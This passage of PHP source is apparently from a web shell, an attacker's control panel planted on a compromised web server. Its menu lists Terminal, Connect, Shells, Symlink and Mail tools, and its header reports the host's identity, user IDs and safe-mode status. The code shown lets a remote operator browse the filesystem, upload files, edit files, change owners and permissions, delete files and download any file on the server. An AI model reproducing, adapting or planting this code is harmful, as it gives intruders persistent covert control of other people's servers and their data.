693 $info .=(($perms & 0x0008)?(($perms & 0x0400)?'s':'x' ):(($perms & 0x0400)?'S':'-'));
694 $info .=(($perms & 0x0004)?'r':'-');$info .=(($perms & 0x0002)?'w':'-');
695 $info .=(($perms & 0x0001)?(($perms & 0x0200)?'t':'x' ):(($perms & 0x0200)?'T':'-'));
696 return sprintf('%s [%s]',$info,substr(decoct($perms),2));
697}
698
699function GetFileSize($x)
700{
701 $x=abs($x);
702 $size=array('B','KB','MB','GB','TB','PB','EB','ZB','YB');
703 $exp=$x?floor(log($x)/log(1024)):0;
704 return sprintf('%.2f '.$size[$exp],($x/pow(1024,floor($exp))));
705}
706
707function GetUser($x)
708{
709 if(function_exists('posix_getpwuid')&&function_exists('posix_getgrgid'))
710 {
711 $uid=posix_getpwuid(posix_getuid());
712 $gid=posix_getgrgid(posix_getgid());
713
714 switch($x)
715 {
716 case 'usr':return $uid['name'];break;
717 case 'uid':return $uid['uid'];break;
718 case 'grp':return $gid['name'];break;
719 case 'gid':return $gid['gid'];break;
720 }
721 }
722 else
723 {
724 switch($x)
725 {
726 case 'usr':return get_current_user();break;
727 case 'uid':return getmyuid();break;
728 case 'grp':return "?";break;
729 case 'gid':return getmygid();break;
730 }
731 }
732}
733
734function GetOwnerGroup($x)
735{
736 if(Unix())
737 {
738 if(function_exists('posix_getpwuid')&&function_exists('posix_getgrgid'))
739 {
740 $user=posix_getpwuid(fileowner($x));
741 $group=posix_getgrgid(filegroup($x));
742 return sprintf('%s:%s',$user['name'],$group['name']);
743 }
744 }
745 return "?:?";
746}
747
748function GetFileOwnerGroup($x)
749{
750 if(Unix())
751 {
752 if(function_exists('posix_getpwuid')&&function_exists('posix_getgrgid'))
753 {
754 $user=posix_getpwuid(fileowner($x));
755 $group=posix_getgrgid(filegroup($x));
756 return sprintf('%s:%s/%s:%s',$user['name'],$user['uid'],$group['name'],$group['gid']);
757 }
758 }
759 return "?:?/?:?";
760}
761
762function GetSafeMode()
763{
764 if(strtolower(ini_get("safe_mode"))=='on')
765 {
766 $safemod="<font class='off'>ON</font>";
767 }
768 else
769 {
770 $safemod="<font class='on'>OFF</font>";
771 }
772 return $safemod;
773}
774
775function MapDirectory($x)
776{
777 $map="";
778 $d=str_replace("\\",_,$x);
779 if(empty($d))
780 {
781 $d=realpath(".");
782 }
783 elseif(realpath($d))
784 {
785 $d=realpath($d);
786 }
787 $d=str_replace("\\",_,$d);
788 if(substr($d,-1)!=_)
789 {
790 $d.=_;
791 }
792 $d=str_replace("\\\\","\\",$d);
793 $pd=$e=explode(_,substr($d,0,-1));
794 $i=0;
795 foreach($pd as $b)
796 {
797 $t="";
798 $j=0;
799 foreach($e as $r)
800 {
801 $t.=$r._;
802 if($j==$i)
803 {
804 break;
805 }
806 $j++;
807 }
808 $map.="<a href=\"?d=".urle($t)."\" >".htmlspecialchars($b)."</a>"._;
809 $i++;
810 }
811 return rtrim($map,_);
812}
813
814function MapDrive($x)
815{
816 if(!Unix())
817 {
818 $v=explode("\\",$x);
819 $v=$v[0];
820 $l="";
821 foreach(range("A","Z") as $lt)
822 {
823 $drive=is_dir($lt.":\\");
824 if($drive)
825 {
826 $l.="<a href=\"?d=".urle($lt.":\\")."\">[";
827 if(strtolower($lt.':')!=strtolower($v))
828 {
829 $l.=$lt;
830 }
831 else
832 {
833 $l.="<font color=\"white\"><b>".$lt."</b></font>";
834 }
835 $l.="]</a>";
836 }
837 }
838 return $l;
839 }
840}
841
842function MainMenu()
843{
844 $menu=array(
845 "ExpL" => "?d=".urle(getcwd()),
846 "★ Sec." => "?x=secure",
847 "Info" => "?x=info",
848 "Database" => "?x=db",
849 "Terminal" => "?x=terminal",
850 "Connect" => "?x=connect",
851 ".Htaccess" => "?x=htaccess",
852 "PHP" => "?x=php",
853 "Perl/CGI" => "?x=perl",
854 "Mail" => "?x=mail",
855 "Process" => "?x=process",
856 "Shells" => "?x=shells",
857 "Symlink" => "?x=symlink",
858 "♛ Tools" => "?z",
859 "Account" => "?x=account",
860 "Update" => "?x=update",
861 "Logout" => "?x=logout"
862 );
863 $nu="";
864 foreach($menu as $key => $val)
865 {
866 $idxkey=substr($val,1,1);
867 $idxval=substr($val,3);
868 $active=any($idxkey,$_REQUEST)&&$_REQUEST[$idxkey]==$idxval?"class='active'":"";
869 if($key=="Logout")
870 {
871 $nu.="<li><a ".$active." href='".$val."' onclick=\"return confirm('Bye !');\">".$key."</a></li>";
872 }
873 else
874 {
875 $nu.="<li><a ".$active." href='".$val."'>".$key."</a></li>";
876 }
877 }
878 return $nu;
879}
880
881function MenuTools($x)
882{
883 global $menu_tools;
884 $ol="<div class='menu-tools'><ul>";
885 $menu_tools=$x;
886
887 foreach($menu_tools as $k => $v)
888 {
889 $active=$_REQUEST['z']==$k?"class='active'":"";
890 $ol.="<li><a ".$active." href='?z=".$k."'>[".$v['title']."]</a></li>";
891 }
892 $ol.="</ul></div>";
893 return $ol;
894}
895
896printf("<div id='header'>
897 <div class='header-left'>
898 <div id='info'>
899 <font class='on'>[%s]</font><br>
900 <font class='on'>[%s]</font><br>
901 [<a href='//%s' target='_blank'>%s</a>]: <font class='on'>%s:%s</font> [%s]: <font class='on'>%s:%s</font><br>
902 [USER]: <font class='on'>%s(%s)</font> [GROUP]: <font class='on'>%s(%s)</font><br>
903 [HDD]: <font class='on'>%s</font> / <font class='on'>%s</font><br>
904 [PHPMODE]: <font class='on'>%s</font><br>
905 [SAFEMODE]: %s<br>
906 </div>
907 </div>
908 <div class='header-right'>
909 <a href='%s'><div id='logo'>
910 <h1 id='title'>%s</h1>
911 <div class='line'>
912 <h2>%s</h2>
913 </div>
914 </div></a>
915 </div>
916 <div class='clr'></div>
917 </div>
918 <div id='container'>
919 <div class='menu'>
920 <ul>%s</ul>
921 </div>
922 <div class='menu-directory'>
923 <div class='map-switch'>
924 <input type='submit' name='map-switch' value='♞' onclick='mapSwitch(\"map1\",\"map2\")'>
925 </div>
926 <div class='map1' id='map1' style='display:inline-block'>
927 <span style='margin-right:5px'>%s</span>
928 <span style='margin-right:5px'>%s</span>
929 </div>
930 <div class='map2' id='map2' style='display:none'>
931 <form method='post' id='map2-form' onsubmit='document.getElementById(\"map2-form\").action=\"?g=\" + encodeURI(document.getElementById(\"map2-input\").value);'>
932 <input type='text' value='%s' id='map2-input'/>
933 <input type='submit' value='Go'>
934 </form>
935 </div>
936 </div>
937 <div class='content'>",
938 php_uname(),server_software,
939 server_name,server_name,gethostbyname(http_host),server_port,
940 B64D($account[0]),remote_addr,remote_port,
941 GetUser("usr"),GetUser("uid"),GetUser("grp"),GetUser("gid"),
942 GetFileSize(@disk_free_space($dir)),GetFileSize(@disk_total_space($dir)),
943 php_sapi_name(),GetSafeMode(),php_self,$config['title'],$config['tagline'],
944 MainMenu(),MapDrive($map),MapDirectory($map),$map
945);
946
947if(any("g",$_REQUEST))
948{
949 $g=$_REQUEST['g'];
950
951 if (is_dir($g))
952 {
953 header('location:'.php_self.'?d='.urle($g));
954 }
955 elseif(is_file($g)||is_link($g))
956 {
957 header('location:'.php_self.'?a=v&r='.urle($g));
958 }
959 else
960 {
961 header('location:'.php_self);
962 }
963}
964
965if(any("d",$_REQUEST)||request_uri===script_name)
966{
967 $_SESSION['c']=urle($dir);
968
969 if(any("file",$_REQUEST)&&$_REQUEST['file']=="New File")
970 {
971 $file=trim($dir._.$_REQUEST['what']);
972
973 if(file_exists($file))
974 {
975 printf("<center style='margin-bottom:10px'><b class='off'>Can't create New File!</b></center>");
976 }
977 else
978 {
979 $mf=@fopen($file,"w");
980 fclose($mf);
981 header("location:".php_self."?a=e&r=".urle($file));
982 }
983 }
984 if(any("directory",$_REQUEST)&&$_REQUEST['directory']=="New Dir")
985 {
986 $dire=trim($_REQUEST['what']);
987
988 @chdir($dir);
989
990 if(!@mkdir($dire))
991 {
992 printf("<center style='margin-bottom:10px'><b class='off'>Can't create New Directory!</b></center>");
993 }
994 else
995 {
996 printf("<center style='margin-bottom:10px'><b class='on'>Directory '%s' Created on %s</b></center>",$dire,GetFileTime($dir._.$dire,'create'));
997 }
998 }
999 if(any("upload",$_REQUEST)&&$_REQUEST['upload']=="Upload")
1000 {
1001 $upload=$dir._.trim(basename($_FILES["what"]["name"]));
1002
1003 if(move_uploaded_file($_FILES["what"]["tmp_name"],$upload))
1004 {
1005 printf("<center style='margin-bottom:10px'><b class='on'>File %s has been uploaded</b></center>",basename($_FILES["what"]["name"]));
1006 }
1007 else
1008 {
1009 printf("<center style='margin-bottom:10px'><b class='off'>✕ Can't upload new file! ✕</b></center>");
1010 }
1011 }
1012 if($handle=@opendir($dir))
1013 {
1014 $reads=array();
1015 $count_dirs=0;
1016 $count_files=0;
1017
1018 while(false!==($file=readdir($handle)))
1019 {
1020 $filedir=rtrim($dir,_)._.$file;
1021 $updir=substr($dir,0,strrpos($dir,_));
1022 if (strlen($updir)<=2) $updir=$updir._;
1023 $type=GetFileType($filedir);
1024 $size=GetFileSize(@filesize($filedir));
1025 $last=GetFileTime($filedir,"modify");
1026 $perm=GetFilePerm($filedir);
1027 $owner=GetOwnerGroup($filedir);
1028 $mime=@mime_content_type($filedir);
1029 $view="";
1030
1031 if(strpos($mime,'image')!==false)
1032 {
1033 $view="?a=v&w=i&r=".urle($filedir);
1034 }
1035 elseif(strpos($mime,'video')!==false)
1036 {
1037 $view="?a=v&w=v&r=".urle($filedir);
1038 }
1039 elseif(strpos($mime,'audio')!==false)
1040 {
1041 $view="?a=v&w=a&r=".urle($filedir);
1042 }
1043 else
1044 {
1045 $view="?a=v&r=".urle($filedir);
1046 }
1047
1048 if($file==".")
1049 {
1050 $reads[]="<tr sorttable_customkey='2'><td><center><input type='checkbox' name='nochk[]' value='".urle($dir)."'/></center></td><td><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAd5JREFUeNqMU79rFUEQ/vbuodFEEkzAImBpkUabFP4ldpaJhZXYm/RiZWsv/hkWFglBUyTIgyAIIfgIRjHv3r39MePM7N3LcbxAFvZ2b2bn22/mm3XMjF+HL3YW7q28YSIw8mBKoBihhhgCsoORot9d3/ywg3YowMXwNde/PzGnk2vn6PitrT+/PGeNaecg4+qNY3D43vy16A5wDDd4Aqg/ngmrjl/GoN0U5V1QquHQG3q+TPDVhVwyBffcmQGJmSVfyZk7R3SngI4JKfwDJ2+05zIg8gbiereTZRHhJ5KCMOwDFLjhoBTn2g0ghagfKeIYJDPFyibJVBtTREwq60SpYvh5++PpwatHsxSm9QRLSQpEVSd7/TYJUb49TX7gztpjjEffnoVw66+Ytovs14Yp7HaKmUXeX9rKUoMoLNW3srqI5fWn8JejrVkK0QcrkFLOgS39yoKUQe292WJ1guUHG8K2o8K00oO1BTvXoW4yasclUTgZYJY9aFNfAThX5CZRmczAV52oAPoupHhWRIUUAOoyUIlYVaAa/VbLbyiZUiyFbjQFNwiZQSGl4IDy9sO5Wrty0QLKhdZPxmgGcDo8ejn+c/6eiK9poz15Kw7Dr/vN/z6W7q++091/AQYA5mZ8GYJ9K0AAAAAASUVORK5CYII='/> <a title='Current Directory' href='?d=".urle($dir)."'>.</a></td><td><center>".$type."</center></td><td><center>".$size."</center></td><td><center>".$perm."</center></td><td><center>".$owner."</center></td><td><center>".$last."</center></td><td><a class='action' href='?a=x&r=".urle($dir)."' onclick=\"return confirm('Delete Directory [ /".basename($dir)." ] ?');\" title='Delete Folder'>✘</a> <a class='action' href='?a=c&r=".urle($dir)."' title='Modify Folder'>ℳ</a></td></tr>";
1051 }
1052 elseif($file=="..")
1053 {
1054 $reads[]="<tr sorttable_customkey='1'><td><center><input type='checkbox' name='nochk[]' value='".urle($updir)."'/></center></td><td><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAmlJREFUeNpsU0toU0EUPfPysx/tTxuDH9SCWhUDooIbd7oRUUTMouqi2iIoCO6lceHWhegy4EJFinWjrlQUpVm0IIoFpVDEIthm0dpikpf3ZuZ6Z94nrXhhMjM3c8895977BBHB2PznK8WPtDgyWH5q77cPH8PpdXuhpQT4ifR9u5sfJb1bmw6VivahATDrxcRZ2njfoaMv+2j7mLDn93MPiNRMvGbL18L9IpF8h9/TN+EYkMffSiOXJ5+hkD+PdqcLpICWHOHc2CC+LEyA/K+cKQMnlQHJX8wqYG3MAJy88Wa4OLDvEqAEOpJd0LxHIMdHBziowSwVlF8D6QaicK01krw/JynwcKoEwZczewroTvZirlKJs5CqQ5CG8pb57FnJUA0LYCXMX5fibd+p8LWDDemcPZbzQyjvH+Ki1TlIciElA7ghwLKV4kRZstt2sANWRjYTAGzuP2hXZFpJ/GsxgGJ0ox1aoFWsDXyyxqCs26+ydmagFN/rRjymJ1898bzGzmQE0HCZpmk5A0RFIv8Pn0WYPsiu6t/Rsj6PauVTwffTSzGAGZhUG2F06hEc9ibS7OPMNp6ErYFlKavo7MkhmTqCxZ/jwzGA9Hx82H2BZSw1NTN9Gx8ycHkajU/7M+jInsDC7DiaEmo1bNl1AMr9ASFgqVu9MCTIzoGUimXVAnnaN0PdBBDCCYbEtMk6wkpQwIG0sn0PQIUF4GsTwLSIFKNqF6DVrQq+IWVrQDxAYQC/1SsYOI4pOxKZrfifiUSbDUisif7XlpGIPufXd/uvdvZm760M0no1FZcnrzUdjw7au3vu/BVgAFLXeuTxhTXVAAAAAElFTkSuQmCC'/> <a title='Parent Directory' href='?d=".urle($updir)."'>".$file."</a></td><td><center>".$type."</center></td><td><center>".$size."</center></td><td><center>".$perm."</center></td><td><center>".$owner."</center></td><td><center>".$last."</center></td><td><a class='action' href='?a=x&r=".urle($updir)."' onclick=\"return confirm('Delete Directory [ /".basename($updir)." ] ?');\" title='Delete Folder'>✘</a> <a class='action' href='?a=c&r=".urle($updir)."' title='Modify Folder'>ℳ</a></td></tr>";
1055 }
1056 else
1057 {
1058 if($type=="dir")
1059 {
1060 $reads[]="<tr sorttable_customkey='3'><td><center><input type='checkbox' name='chk[]' value='".urle($filedir)."' /></center></td><td><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAd5JREFUeNqMU79rFUEQ/vbuodFEEkzAImBpkUabFP4ldpaJhZXYm/RiZWsv/hkWFglBUyTIgyAIIfgIRjHv3r39MePM7N3LcbxAFvZ2b2bn22/mm3XMjF+HL3YW7q28YSIw8mBKoBihhhgCsoORot9d3/ywg3YowMXwNde/PzGnk2vn6PitrT+/PGeNaecg4+qNY3D43vy16A5wDDd4Aqg/ngmrjl/GoN0U5V1QquHQG3q+TPDVhVwyBffcmQGJmSVfyZk7R3SngI4JKfwDJ2+05zIg8gbiereTZRHhJ5KCMOwDFLjhoBTn2g0ghagfKeIYJDPFyibJVBtTREwq60SpYvh5++PpwatHsxSm9QRLSQpEVSd7/TYJUb49TX7gztpjjEffnoVw66+Ytovs14Yp7HaKmUXeX9rKUoMoLNW3srqI5fWn8JejrVkK0QcrkFLOgS39yoKUQe292WJ1guUHG8K2o8K00oO1BTvXoW4yasclUTgZYJY9aFNfAThX5CZRmczAV52oAPoupHhWRIUUAOoyUIlYVaAa/VbLbyiZUiyFbjQFNwiZQSGl4IDy9sO5Wrty0QLKhdZPxmgGcDo8ejn+c/6eiK9poz15Kw7Dr/vN/z6W7q++091/AQYA5mZ8GYJ9K0AAAAAASUVORK5CYII='/> <a title='Open Directory' href='?d=".urle($filedir)."'>".$file."</a></td><td><center>".$type."</center></td><td><center>".$size."</center></td><td><center>".$perm."</center></td><td><center>".$owner."</center></td><td><center>".$last."</center></td><td><a class='action' href='?a=x&r=".urle($filedir)."' onclick=\"return confirm('Delete Directory [ /".basename($filedir)." ] ?');\" title='Delete Folder'>✘</a> <a class='action' href='?a=c&r=".urle($filedir)."' title='Modify Folder'>ℳ</a></td></tr>";
1061 $count_dirs++;
1062 }
1063 else
1064 {
1065 $reads[]="<tr sorttable_customkey='4'><td><center><input type='checkbox' name='chk[]' value='".urle($filedir)."' /></center></td><td><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAIAAACQkWg2AAAABnRSTlMAAAAAAABupgeRAAABHUlEQVR42o2RMW7DIBiF3498iHRJD5JKHurL+CRVBp+i2T16tTynF2gO0KSb5ZrBBl4HHDBuK/WXACH4eO9/CAAAbdvijzLGNE1TVZXfZuHg6XCAQESAZXbOKaXO57eiKG6ft9PrKQIkCQqFoIiQFBGlFIB5nvM8t9aOX2Nd18oDzjnPgCDpn/BH4zh2XZdlWVmWiUK4IgCBoFMUz9eP6zRN75cLgEQhcmTQIbl72O0f9865qLAAsURAAgKBJKEtgLXWvyjLuFsThCSstb8rBCaAQhDYWgIZ7myM+TUBjDHrHlZcbMYYk34cN0YSLcgS+wL0fe9TXDMbY33fR2AYBvyQ8L0Gk8MwREBrTfKe4TpTzwhArXWi8HI84h/1DfwI5mhxJamFAAAAAElFTkSuQmCC'> <a title='View File' href='".$view."'>".$file."</a></td><td><center>".$type."</center></td><td><center>".$size."</center></td><td><center>".$perm."</center></td><td><center>".$owner."</center></td><td><center>".$last."</center></td><td><a class='action' href='?a=e&r=".urle($filedir)."' title='Modify File'>ℳ</a> <a class='action' href='?a=x&r=".urle($filedir)."' onclick=\"return confirm('Delete Filename [ ".basename($filedir)." ] ?');\" title='Delete File'>✘</a> <a class='action' href='?a=d&r=".urle($filedir)."' title='Download File'>➥</a></td></tr>";
1066 $count_files++;
1067 }
1068 }
1069 }
1070 sort($reads);
1071 $filesdirs="";
1072 foreach($reads as $read)
1073 {
1074 $filesdirs.=$read;
1075 }
1076 printf("<div id='action'>
1077 <table><tr>
1078 <td><form class='new' method=POST action='?d=%s'>
1079 <input name='what' type='text' /><input type='submit' name='file' value='New File'/>
1080 </form></td>
1081 <td><form class='new' method=POST action='?d=%s'>
1082 <input name='what' type='text' /><input type='submit' name='directory' value='New Dir'/>
1083 </form></td>
1084 <td><form class='new' method=POST action='?x=find'>
1085 <input type='text' name='find-value' id='find-action'/><input type='submit' name='find-button' value='Find'/>
1086 </form></td>
1087 <td><form class='new' method=POST action='?d=%s&x=upload' enctype='multipart/form-data'>
1088 <input name='what' type='file' class='inputfile'/><input type='submit' name='upload' value='Upload'/>
1089 </form></td>
1090 </tr></table>
1091 </div>
1092 <div id='home'>
1093 <form name='files' method=POST action='?x=action' onclick='checkCount(\"count\")'>
1094 <table class='table sortable'>
1095 <thead>
1096 <tr>
1097 <th class='sorttable_nosort'><input type='checkbox' name='check-all' onclick='checkAll()'/></th>
1098 <th class='sorttable_numeric'>Name</th>
1099 <th>Type</th>
1100 <th>Size</th>
1101 <th>Perms</th>
1102 <th>Owner:Group</th>
1103 <th>Modified</th>
1104 <th>Act.</th>
1105 </tr>
1106 </thead>
1107 <tbody>%s</tbody>
1108 <tFoot>
1109 <tr>
1110 <td colspan='8'>[<span id='count'>0</span>] Selected | Dir's: [%s] File's: [%s]</td>
1111 </tr>
1112 </tFoot>
1113 </table>
1114 <select name='action-value'>
1115 <option value='copy'>Copy</option>
1116 <option value='move'>Move</option>
1117 <option value='delete'>Delete</option>
1118 <option value='zip'>Archive (zip)</option>
1119 <option value='unzip'>Extract to (zip)</option>
1120 </select>
1121 <input type='submit' value='Action' name='action-button' />
1122 </form>
1123 </div>",
1124 urle($dir),
1125 urle($dir),
1126 urle($dir),
1127 $filesdirs,
1128 $count_dirs,
1129 $count_files
1130 );
1131 closedir($handle);
1132 }
1133 else
1134 {
1135 print "<center style='margin-bottom:10px'><b class='off'>Can't Open Location</b></center>";
1136 }
1137}
1138
1139if(any("r",$_REQUEST))
1140{
1141 if(file_exists(urld($_REQUEST["r"])))
1142 {
1143 $file=strval(urld($_REQUEST["r"]));
1144 $status=any("status",$_SESSION)?$_SESSION['status']:"";
1145 $back=php_self."?d=".urle($dir);
1146
1147 printf("<div class='divide'>
1148 <div class='divide-left'>
1149 <table class='table'>
1150 <tr><td>Name</td><td>%s</td></tr>
1151 <tr><td>Size</td><td>%s</td></tr>
1152 <tr><td>Permission</td><td>%s</td></tr>
1153 <tr><td>Create time</td><td>%s</td></tr>
1154 <tr><td>Last modified</td><td>%s</td></tr>
1155 <tr><td>Last accessed</td><td>%s</td></tr>
1156 </table>
1157 </div>
1158 <div class='divide-right'>
1159 <table class='table'>
1160 <tr><td>MIME</td><td>%s</td></tr>
1161 <tr><td>Owner/Group</td><td>%s</td></tr>
1162 <tr><td>MD5</td><td>%s</td></tr>
1163 <tr><td>SHA1</td><td>%s</td></tr>
1164 </table>
1165 </div>
1166 </div>",
1167 basename($file),
1168 GetFileSize(@filesize($file)),
1169 GetFilePerm($file),
1170 GetFileTime($file,"create"),
1171 GetFileTime($file,"modify"),
1172 GetFileTime($file,"access"),
1173 mime_content_type($file),
1174 GetFileOwnerGroup($file),
1175 @md5_file($file),
1176 @sha1_file($file)
1177 );
1178
1179 if(is_file($file)||is_link($file))
1180 {
1181 $menu=array(
1182
1183 "Back" => "?a=b&r=",
1184 "Edit" => "?a=e&r=",
1185 "View" => "?a=v&r=",
1186 "Copy" => "?a=cp&r=",
1187 "Move" => "?a=mv&r=",
1188 "Download" => "?a=d&r=",
1189 "Hexdump" => "?a=h&r=",
1190 "Chmod" => "?a=c&r=",
1191 "Chown" => "?a=cwn&r=",
1192 "Chgrp" => "?a=cgp&r=",
1193 "Touch" => "?a=t&r=",
1194 "Rename" => "?a=r&r=",
1195 "Delete" => "?a=x&r="
1196 );
1197 }
1198 elseif(is_dir($file))
1199 {
1200 $menu=array(
1201
1202 "Back" => "?a=b&r=",
1203 "Chmod" => "?a=c&r=",
1204 "Chown" => "?a=cwn&r=",
1205 "Chgrp" => "?a=cgp&r=",
1206 "Touch" => "?a=t&r=",
1207 "Rename" => "?a=r&r=",
1208 "Delete" => "?a=x&r="
1209 );
1210 }
1211
1212 $nu="";
1213
1214 foreach($menu as $key => $val)
1215 {
1216 $idxkey=substr($val,1,1);
1217 $idxval=substr($val,3,strpos($val,'&')-3);
1218 $active=any($idxkey,$_REQUEST)&&$_REQUEST[$idxkey]==$idxval?"class='active'":"";
1219 if($key=="Delete")
1220 {
1221 $nu.="<li><a ".$active." href='".$val.urle($file)."' onclick=\"return confirm('Delete Filename [ ".basename($file)." ] ?');\">".$key."</a></li>";
1222 }
1223 elseif($key=="Back")
1224 {
1225 $nu.="<li><a ".$active." href='".$back."'>".$key."</a></li>";
1226 }
1227 else
1228 {
1229 $nu.="<li><a ".$active." href='".$val.urle($file)."'>".$key."</a></li>";
1230 }
1231 }
1232
1233 printf("<div class='menu'>
1234 <ul>%s</ul>
1235 </div>",$nu);
1236
1237 if($_REQUEST['a']=='e')
1238 {
1239 $source="";
1240
1241 if(filesize($file) > 5242880)
1242 {
1243 $source.="Lazy to Read more than 5MB Files";
1244 }
1245 else
1246 {
1247 $open=fopen($file,'r');
1248
1249 if($open)
1250 {
1251 while(!feof($open))
1252 {
1253 $source.=htmlentities(fread($open,(1024*4)));
1254 }
1255 fclose($open);
1256 }
1257 }
1258
1259 printf("<form class='frmsource' method='post'>
1260 <textarea id='sourcefocus' name='sourcecode' rows='25' cols='100'>%s</textarea>
1261 <input type='Submit' value='Save file' name='save'/>
1262 <label>%s</label>
1263 </form>",$source,$status);
1264
1265 if(any("status",$_SESSION)) unset($_SESSION['status']);
1266
1267 if(any("save",$_REQUEST))
1268 {
1269 $new_source=$_REQUEST['sourcecode'];
1270 if(function_exists("chmod")) chmod($file,0755);
1271 $source_edit=fopen($file,'w+');
1272 $tulis=fwrite($source_edit,$new_source);
1273 fclose($source_edit);
1274 if($tulis)
1275 {
1276 $_SESSION['status']="File Saved ! ".GetFileTime($file,"modify")." | ".GetFileSize(filesize($file));
1277 }
1278 else
1279 {
1280 $_SESSION['status']="Whoops, something went wrong...";
1281 }
1282 header("location:".php_self."?a=e&r=".urle($file));
1283 }
1284 }
1285
1286 if($_REQUEST['a']=='r')
1287 {
1288 printf("<form class='new' method='post'>
1289 <input type='text' name='name' value='%s'/>
1290 <input type='Submit' value='Rename' name='rename'/>
1291 <label>%s</label>
1292 </form>",basename($file),$status);
1293
1294 if(any("status",$_SESSION)) unset($_SESSION['status']);
1295
1296 if(any("rename",$_REQUEST))
1297 {
1298 $path=pathinfo(trim($file));
1299 $newname=$path['dirname']._.trim($_REQUEST['name']);
1300 if(!rename(trim($file),$newname))
1301 {
1302 $_SESSION['status']='Whoops, something went wrong...';
1303 }
1304 else
1305 {
1306 $_SESSION['status']='Renamed file with success';
1307 }
1308 header("location:".php_self."?a=r&r=".urle($newname));
1309 }
1310 }
1311
1312 if($_REQUEST['a']=='c')
1313 {
1314 printf("<form class='new' method='post'>
1315 <input type='text' name='octal' value='%s'/>
1316 <input type='Submit' value='Chmod' name='chmod'/>
1317 <label>%s</label>
1318 </form>",substr(decoct(fileperms($file)),2),$status);
1319
1320 if(any("status",$_SESSION)) unset($_SESSION['status']);
1321
1322 if(any("chmod",$_REQUEST))
1323 {
1324 $octal=octdec($_REQUEST['octal']);
1325 if(!chmod(trim($file),$octal))
1326 {
1327 $_SESSION['status']='Whoops, something went wrong...';
1328 }
1329 else
1330 {
1331 $_SESSION['status']='Chmod file with success';
1332 }
1333 header("location:".php_self."?a=c&r=".urle($file));
1334 }
1335 }
1336
1337 if($_REQUEST['a']=='cwn')
1338 {
1339 $own='';
1340 if(function_exists('posix_getpwuid'))
1341 {
1342 $user=posix_getpwuid(fileowner($x));
1343 $own=$user['name'];
1344 }
1345
1346 printf("<form class='new' method='post'>
1347 <input type='text' name='own' value='%s'/>
1348 <input type='Submit' value='Chown' name='chown'/>
1349 <label>%s</label>
1350 </form>",$own,$status);
1351
1352 if(any("status",$_SESSION)) unset($_SESSION['status']);
1353
1354 if(any("chown",$_REQUEST))
1355 {
1356 $own=$_REQUEST['own'];
1357 if(!chown(trim($file),$own))
1358 {
1359 $_SESSION['status']='Whoops, something went wrong...';
1360 }
1361 else
1362 {
1363 $_SESSION['status']='Chown file with success';
1364 }
1365 header("location:".php_self."?a=cwn&r=".urle($file));
1366 }
1367 }
1368
1369 if($_REQUEST['a']=='cgp')
1370 {
1371 $grp='';
1372 if(function_exists('posix_getgrgid'))
1373 {
1374 $group=posix_getgrgid(filegroup($x));
1375 $grp=$group['name'];
1376 }
1377
1378 printf("<form class='new' method='post'>
1379 <input type='text' name='grp' value='%s'/>
1380 <input type='Submit' value='Chgrp' name='chgrp'/>
1381 <label>%s</label>
1382 </form>",$grp,$status);
1383
1384 if(any("status",$_SESSION)) unset($_SESSION['status']);
1385
1386 if(any("chgrp",$_REQUEST))
1387 {
1388 $grp=$_REQUEST['grp'];
1389 if(!chgrp(trim($file),$grp))
1390 {
1391 $_SESSION['status']='Whoops, something went wrong...';
1392 }
1393 else
1394 {
1395 $_SESSION['status']='Chgrp file with success';
1396 }
1397 header("location:".php_self."?a=cgp&r=".urle($file));
1398 }
1399 }
1400
1401 if($_REQUEST['a']=='t')
1402 {
1403 printf("<form class='new' method='post'>
1404 <input type='text' name='time' value='%s'/>
1405 <input type='Submit' value='Touch' name='touch'/>
1406 <label>%s</label>
1407 </form>",GetFileTime($file,"modify"),$status);
1408
1409 if(any("status",$_SESSION)) unset($_SESSION['status']);
1410
1411 if(any("touch",$_REQUEST))
1412 {
1413 $time=$_REQUEST['time'];
1414 if(!touch(trim($file),strtotime($time)))
1415 {
1416 $_SESSION['status']='Whoops, something went wrong...';
1417 }
1418 else
1419 {
1420 $_SESSION['status']='Touched file with success';
1421 }
1422 header("location:".php_self."?a=t&r=".urle($file));
1423 }
1424 }
1425
1426 if($_REQUEST['a']=='v')
1427 {
1428 printf("<div class='menu'>
1429 <ul>
1430 <li><a href='?a=v&r=%s'>Source</a></li>
1431 <li><a href='?a=v&w=f&r=%s'>iFrame</a></li>
1432 <li><a href='?a=v&w=i&r=%s'>Image</a></li>
1433 <li><a href='?a=v&w=v&r=%s'>Video</a></li>
1434 <li><a href='?a=v&w=a&r=%s'>Audio</a></li>
1435 </ul>
1436 </div>",
1437 urle($file),urle($file),
1438 urle($file),urle($file),
1439 urle($file));
1440
1441 if(is_readable($file))
1442 {
1443 if(any("w",$_REQUEST))
1444 {
1445 $url=GetUrlFromPath($file);
1446 $type=end(explode(".",$file));
1447
1448 if($_REQUEST['w']=='f')
1449 {
1450 printf("<center><iframe src='%s' width='100%%' height='325' frameBorder='0'>Suck</iframe><a href='%s' target='_blank'>--> New Tab <--</a></center>",$url,$url);
1451 }
1452
1453 if($_REQUEST['w']=='i')
1454 {
1455 printf("<center><img src='%s' alt=' Not Image'/></center>",$url);
1456 }
1457
1458 if($_REQUEST['w']=='v')
1459 {
1460 printf("<center><video width='640' height='320' controls><source src='%s' type='video/%s'>Suck</video></center>",$url,$type);
1461 }
1462
1463 if($_REQUEST['w']=='a')
1464 {
1465 printf("<center><audio controls><source src='%s' type='audio/%s'>Suck</audio></center>",$url,$type);
1466 }
1467 }
1468 else
1469 {
1470 if(filesize($file) > 5242880)
1471 {
1472 printf("Lazy to Read more than 5MB Files");
1473 }
1474 else
1475 {
1476 $code=highlight_file($file,true);
1477 printf("<div class='highlight'>%s</div>",$code);
1478 }
1479 }
1480 }
1481 }
1482
1483 if($_REQUEST['a']=='h')
1484 {
1485 $c=file_get_contents($file);
1486 $n=0;
1487 $h=array('00000000<br>','','');
1488 $len=strlen($c);
1489 for($i=0;$i<$len;++$i)
1490 {
